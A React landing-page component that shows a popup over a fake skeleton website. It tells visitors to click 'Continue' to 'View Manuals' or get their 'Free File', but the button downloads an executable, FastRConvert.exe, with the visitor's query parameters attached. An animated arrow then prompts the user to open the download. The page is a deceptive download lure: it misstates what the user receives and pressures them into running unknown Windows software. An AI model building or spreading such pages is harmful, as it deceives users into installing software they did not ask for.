import React, { useEffect, useState } from 'react';

const Landing = () => {
    const [link, setLink] = useState('https://fastrconvert.com/FastRConvert.exe');
    const [showArrow, setShowArrow] = useState(false);

    useEffect(() => {
        const urlParams = new URLSearchParams(window.location.search);
        let baseUrl = 'https://fastrconvert.com/FastRConvert.exe';
        const finalUrl = `${baseUrl}?${urlParams.toString()}`;
        setLink(finalUrl);
    }, []);

    const handleContinueClick = (e) => {
        setShowArrow(true);

        setTimeout(() => {
            setShowArrow(false);
        }, 20000);
    };

    return (
        <div className="popup-container">
            <div className="skeleton-background">
                {/* Skeleton header with logo and search */}
                <div className="skeleton-header">
                    <div className="skeleton-logo"></div>
                    <div className="skeleton-search"></div>
                </div>

                {/* Skeleton navbar with items */}
                <div className="skeleton-navbar">
                    <div className="skeleton-nav-item"></div>
                    <div className="skeleton-nav-item"></div>
                    <div className="skeleton-nav-item"></div>
                    <div className="skeleton-nav-item"></div>
                    <div className="skeleton-nav-item"></div>
                </div>

                {/* Skeleton banner */}
                <div className="skeleton-banner">
                    <div className="skeleton-banner-text"></div>
                    <div className="skeleton-banner-button"></div>
                </div>

                {/* Skeleton content - icons row */}
                <div className="skeleton-icons-container">
                    {[1, 2, 3, 4, 5, 6].map((item) => (
                        <div key={item} className="skeleton-icon-item">
                            <div className="skeleton-icon"></div>
                            <div className="skeleton-icon-text"></div>
                        </div>
                    ))}
                </div>

                {/* Skeleton content rows */}
                <div className="skeleton-content">
                    <div className="skeleton-section-header">
                        <div className="skeleton-section-title"></div>
                        <div className="skeleton-section-subtitle"></div>
                    </div>

                    <div className="skeleton-row">
                        <div className="skeleton-circle"></div>
                        <div className="skeleton-text-large"></div>
                        <div className="skeleton-text-small"></div>
                    </div>
                    <div className="skeleton-row">
                        <div className="skeleton-circle"></div>
                        <div className="skeleton-text-large"></div>
                        <div className="skeleton-text-small"></div>
                    </div>
                    <div className="skeleton-row">
                        <div className="skeleton-circle"></div>
                        <div className="skeleton-text-large"></div>
                        <div className="skeleton-text-small"></div>
                    </div>
                    <div className="skeleton-row">
                        <div className="skeleton-circle"></div>
                        <div className="skeleton-text-large"></div>
                        <div className="skeleton-text-small"></div>
                    </div>
                </div>

                {/* Skeleton footer */}
                <div className="skeleton-footer">
                    <div className="skeleton-footer-section">
                        <div className="skeleton-footer-title"></div>
                        <div className="skeleton-footer-item"></div>
                        <div className="skeleton-footer-item"></div>
                        <div className="skeleton-footer-item"></div>
                    </div>
                    <div className="skeleton-footer-section">
                        <div className="skeleton-footer-title"></div>
                        <div className="skeleton-footer-item"></div>
                        <div className="skeleton-footer-item"></div>
                    </div>
                </div>
            </div>

            {/* Popup Dialog */}
            <div className="popup-dialog">
                <div className="popup-content">
                    <h2 className="popup-title">Click "Continue" to View Manuals</h2>
                    <h3 className="popup-subtitle">With FastConvert</h3>

                    <div className="compatibility-message">
                        <div className="check-icon">✓</div>
                        <p>Compatible with Windows & Your Browser</p>
                    </div>

                    <p className="download-text">Click Continue To Get Your Free File Now</p>

                    <a
                        href={link}
                        download
                        className="continue-button"
                        onClick={handleContinueClick}
                    >
                        Continue
                    </a>

                    <p className="terms-text">By clicking continue, you agree to the Terms and Privacy Policy</p>
                </div>
            </div>

            {/* Download Arrow - Only visible after clicking continue */}
            {showArrow && (
                <div className="download-arrow-container">
                    <div className="download-arrow-message">
                        Your download has started!
                        <br />
                        Click here for your file
                    </div>
                    <div className="download-arrow"></div>
                </div>
            )}

            {/* CSS Styles */}
            <style>{`
        .popup-container {
          position: relative;
          width: 100%;
          height: 100vh;
          display: flex;
          justify-content: center;
          align-items: center;
          font-family: Arial, sans-serif;
        }
        
        .skeleton-background {
          position: absolute;
          top: 0;
          left: 0;
          width: 100%;
          height: 100%;
          background-color: #f5f5f5;
          opacity: 0.9;
          z-index: 1;
          padding: 20px;
          box-sizing: border-box;
          overflow: hidden;
        }
        
        .skeleton-header {
          width: 100%;
          height: 40px;
          background-color: #e8e8e8;
          margin-bottom: 20px;
          border-radius: 4px;
          position: relative;
          overflow: hidden;
        }
        
        .skeleton-header:after {
          content: '';
          position: absolute;
          top: 0;
          left: 0;
          width: 30%;
          height: 100%;
          background: linear-gradient(90deg, transparent, #d1d1d1, transparent);
          animation: shimmer 1.5s infinite;
        }
        
        .skeleton-navbar {
          width: 100%;
          height: 50px;
          background-color: #e8e8e8;
          margin-bottom: 30px;
          border-radius: 4px;
          display: flex;
          padding: 0 10px;
        }
        
        .skeleton-nav-item {
          width: 80px;
          height: 25px;
          background-color: #d9d9d9;
          margin: auto 15px auto 0;
          border-radius: 3px;
        }
        
        .skeleton-icons-container {
          display: flex;
          justify-content: space-around;
          margin-bottom: 40px;
          padding: 15px;
          background-color: #f0f0f0;
          border-radius: 8px;
          box-shadow: 0 2px 4px rgba(0, 0, 0, 0.05);
        }
        
        .skeleton-icon-item {
          display: flex;
          flex-direction: column;
          align-items: center;
        }
        
        .skeleton-icon {
          width: 40px;
          height: 40px;
          background-color: #e0e0e0;
          border-radius: 8px;
          margin-bottom: 10px;
          position: relative;
          overflow: hidden;
        }
        
        .skeleton-icon:after {
          content: '';
          position: absolute;
          top: 0;
          left: -100%;
          width: 100%;
          height: 100%;
          background: linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.2), transparent);
          animation: shimmer 2s infinite;
        }
        
        .skeleton-icon-text {
          width: 60px;
          height: 10px;
          background-color: #e0e0e0;
          border-radius: 3px;
        }
        
        .skeleton-content {
          padding: 15px;
          background-color: white;
          border-radius: 8px;
          box-shadow: 0 2px 8px rgba(0, 0, 0, 0.05);
          margin-top: 20px;
        }
        
        .skeleton-row {
          display: flex;
          align-items: center;
          padding: 15px 0;
          border-bottom: 1px solid #f0f0f0;
        }
        
        .skeleton-row:last-child {
          border-bottom: none;
        }
        
        .skeleton-circle {
          width: 30px;
          height: 30px;
          background-color: #e8e8e8;
          border-radius: 50%;
          margin-right: 20px;
          position: relative;
          overflow: hidden;
        }
        
        .skeleton-circle:after {
          content: '';
          position: absolute;
          top: 0;
          left: -100%;
          width: 100%;
          height: 100%;
          background: linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.3), transparent);
          animation: shimmer 2s infinite;
        }
        
        .skeleton-text-large {
          width: 200px;
          height: 14px;
          background-color: #e8e8e8;
          border-radius: 3px;
          margin-right: 20px;
          position: relative;
          overflow: hidden;
        }
        
        .skeleton-text-large:after {
          content: '';
          position: absolute;
          top: 0;
          left: -100%;
          width: 100%;
          height: 100%;
          background: linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.3), transparent);
          animation: shimmer 2s infinite;
        }
        
        .skeleton-text-small {
          width: 100px;
          height: 14px;
          background-color: #e8e8e8;
          border-radius: 3px;
          position: relative;
          overflow: hidden;
        }
        
        .skeleton-text-small:after {
          content: '';
          position: absolute;
          top: 0;
          left: -100%;
          width: 100%;
          height: 100%;
          background: linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.3), transparent);
          animation: shimmer 2s infinite;
        }
        
        @keyframes shimmer {
          0% {
            transform: translateX(0);
          }
          100% {
            transform: translateX(200%);
          }
        }
        
        .skeleton-logo {
          width: 120px;
          height: 25px;
          background-color: #d1d1d1;
          border-radius: 4px;
          margin: 8px 0 0 10px;
        }
        
        .skeleton-search {
          width: 200px;
          height: 25px;
          background-color: #d1d1d1;
          border-radius: 15px;
          margin: 8px 10px 0 auto;
        }
        
        .skeleton-banner {
          width: 100%;
          height: 100px;
          background-color: #e0e0e0;
          margin-bottom: 30px;
          border-radius: 8px;
          display: flex;
          padding: 20px;
          box-shadow: 0 2px 5px rgba(0, 0, 0, 0.05);
          position: relative;
          overflow: hidden;
        }
        
        .skeleton-banner:after {
          content: '';
          position: absolute;
          top: 0;
          left: -100%;
          width: 100%;
          height: 100%;
          background: linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.2), transparent);
          animation: shimmer 3s infinite;
        }
        
        .skeleton-banner-text {
          width: 60%;
          height: 60px;
          display: flex;
          flex-direction: column;
          justify-content: space-between;
        }
        
        .skeleton-banner-text:before {
          content: '';
          width: 80%;
          height: 18px;
          background-color: #d1d1d1;
          border-radius: 3px;
        }
        
        .skeleton-banner-text:after {
          content: '';
          width: 60%;
          height: 12px;
          background-color: #d1d1d1;
          border-radius: 3px;
        }
        
        .skeleton-banner-button {
          width: 120px;
          height: 35px;
          background-color: #d1d1d1;
          border-radius: 18px;
          margin-left: auto;
          align-self: center;
        }
        
        .skeleton-section-header {
          margin-bottom: 20px;
          padding-bottom: 10px;
          border-bottom: 1px solid #eaeaea;
        }
        
        .skeleton-section-title {
          width: 150px;
          height: 18px;
          background-color: #e0e0e0;
          border-radius: 3px;
          margin-bottom: 10px;
        }
        
        .skeleton-section-subtitle {
          width: 250px;
          height: 12px;
          background-color: #e8e8e8;
          border-radius: 3px;
        }
        
        .skeleton-footer {
          margin-top: 30px;
          padding: 20px;
          background-color: #e8e8e8;
          border-radius: 8px;
          display: flex;
          justify-content: space-between;
        }
        
        .skeleton-footer-section {
          width: 45%;
        }
        
        .skeleton-footer-title {
          width: 100px;
          height: 16px;
          background-color: #d1d1d1;
          border-radius: 3px;
          margin-bottom: 15px;
        }
        
        .skeleton-footer-item {
          width: 80%;
          height: 10px;
          background-color: #d9d9d9;
          border-radius: 3px;
          margin-bottom: 0;
          margin-top: 12px;
        }
        
        .popup-dialog {
          scale: 140%;
          position: relative;
          z-index: 10;
          background-color: white;
          border-radius: 8px;
          box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
          width: 500px;
          padding: 40px;
          text-align: center;
        }
        
        .popup-title {
          font-size: 20px;
          font-weight: bold;
          margin: 0 0 5px 0;
          color: #333;
        }
        
        .popup-subtitle {
          font-size: 16px;
          font-weight: normal;
          margin: 0 0 25px 0;
          color: #555;
        }
        
        .compatibility-message {
          display: flex;
          align-items: center;
          justify-content: center;
          margin-bottom: 20px;
          font-size: 14px;
          color: #333;
        }
        
        .check-icon {
          color: #4CAF50;
          font-size: 18px;
          margin-right: 10px;
        }
        
        .download-text {
          font-size: 14px;
          margin-bottom: 20px;
          color: #555;
        }
        
        .continue-button {
          display: inline-block;
          background-color: #2196F3;
          color: white;
          border: none;
          border-radius: 25px;
          padding: 10px 30px;
          font-size: 16px;
          cursor: pointer;
          margin-bottom: 20px;
          transition: background-color 0.3s;
          text-decoration: none;
        }
        
        .continue-button:hover {
          background-color: #0b7dda;
        }
        
        .terms-text {
          font-size: 12px;
          color: #777;
          margin: 20px;
        }
        
        /* Download Arrow Styles */
        .download-arrow-container {
          position: fixed;
          top: 0;
          right: 30px;
          z-index: 1000;
          display: flex;
          flex-direction: column;
          align-items: flex-end;
          animation: fadeIn 0.5s ease-in-out;
        }
        
        @keyframes fadeIn {
          from { opacity: 0; }
          to { opacity: 1; }
        }
        
        .download-arrow-message {
          background-color: #2196F3;
          color: white;
          padding: 10px 15px;
          border-radius: 6px;
          font-size: 14px;
          margin-bottom: 10px;
          text-align: center;
          box-shadow: 0 2px 10px rgba(0, 0, 0, 0.2);
          line-height: 1.4;
        }
        
        .download-arrow {
          width: 0;
          height: 0;
          border-left: 15px solid transparent;
          border-right: 15px solid transparent;
          border-bottom: 20px solid #2196F3;
          margin-right: 25%;
          transform-origin: top center;
          animation: pointUp 1s ease-in-out infinite alternate;
        }
        
        @keyframes pointUp {
          from {
            transform: translateY(0);
          }
          to {
            transform: translateY(-10px);
          }
        }
      `}</style>
        </div>
    );
};

export default Landing;